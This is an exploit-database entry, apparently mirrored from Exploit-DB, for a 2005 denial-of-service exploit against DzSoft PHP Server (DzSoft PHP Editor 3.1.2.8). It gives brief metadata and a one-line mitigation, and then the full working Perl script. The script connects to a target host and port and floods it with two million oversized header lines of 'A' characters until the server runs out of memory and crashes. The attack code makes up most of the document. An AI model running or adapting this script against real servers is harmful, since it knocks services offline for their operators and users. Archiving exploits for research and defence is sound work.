DzSoft PHP Server DOS Exploit

vendor:

DzSoft PHP Editor

by:

Infam0us Gr0up - Securiti Research

7,5

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: DzSoft PHP Editor

Affected Version From: 3.1.2.8

Affected Version To: 3.1.2.8

Patch Exists: YES

Related CWE: N/A

CPE: a:dzsoft:dzsoft_php_editor

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2005

DzSoft PHP Server DOS Exploit

This exploit is used to cause a Denial of Service (DoS) attack on a vulnerable DzSoft PHP Server. It sends a large number of requests to the server, causing it to run out of memory and crash. It was tested on Windows 2000 SP4 (Win NT).

Mitigation:

Ensure that the server is running the latest version of DzSoft PHP Server and that all security patches are applied.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
#    DzSoft PHP Server DOS Exploit
# ------------------------------------
#  Infam0us Gr0up - Securiti Research
# 
#
# Tested on Windows2000 SP4 (Win NT)
# Info: infamous.2hell.com
#

$subject = "DzSoft PHP Server DOS Exploit";
$vers = "DzSoft PHP Editor  3.1.2.8";
$vendor = "http://www.dzsoft.com";
$codz = "basher13 - basher13(at)linuxmail.org";

$ARGC=@ARGV;
if ($ARGC !=2) {
    print "\n";
    print "   $subject\n";
    print "------------------------------------\n\n";
    print "Usage: $0 [remote IP] [port]\n";
    print "Exam: $0 127.0.0.1 80\n";
    exit;
}

use IO::Socket::INET;
use Tk;

$host=$ARGV[0];
$port=$ARGV[1];

print "\n";
print "-------------------------------------------------------\n";
print "[?] Version: libwww-perl-$LWP::VERSION\n";
print "[+] Connect to $host..\n";
$sock = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port, Proto => 'tcp') 
|| die "[-] Connection error$@\n";

print "[+] Connected\n";
print "[+] Bindmode for socket..\n";
sleep(1);
binmode($sock);

print "[+] Build buffer..\n";
$hostname="Host: $host";
$bufy='A'x50;
$bufa='A'x8183;
$len=length($bufy);
$buff="GET / HTTP/1.1\r\n";
sleep(1);

print "[+] Now kill the process..wait\n";
send($sock,$buff,0) || die "[-] send error:$@\n";
print "[+] Sending buffer..\n";
for($i= 0; $i < 2000000; $i++)
{
    $buff=" $bufa\r\n";
    send($sock,$buff,0) || die "[*] send error:$@, Check if server D0s'ed\n";
}
$buff="$hostname\r\n";
$buff.="Content-Length: $len\r\n";

$buff.="\r\n";
$buff.=$bufy."\r\n\r\n";

send($sock,$buff,0) || die "[-] send error:$@\n";
print "[+] Server Out of Memory\n";
close($sock);
print "-------------------------------------------------------\n";
my $mw = MainWindow->new(-title => 'INFO',);
    my $var;

    my $opt = $mw->Optionmenu(
                
                -options => [qw()],
                -command => sub { print "\n[>]: ", shift, "\n" },
                -variable => \$var,
                )->pack;
    $opt->addOptions([- Subject=>$subject],[- Version=>$vers],[- Vendor=>$vendor],[- Coder=>$codz]);   
    $mw->Button(-text=>'CLOSE', -command=>sub{$mw->destroy})->pack;
    MainLoop;

# milw0rm.com [2005-07-15]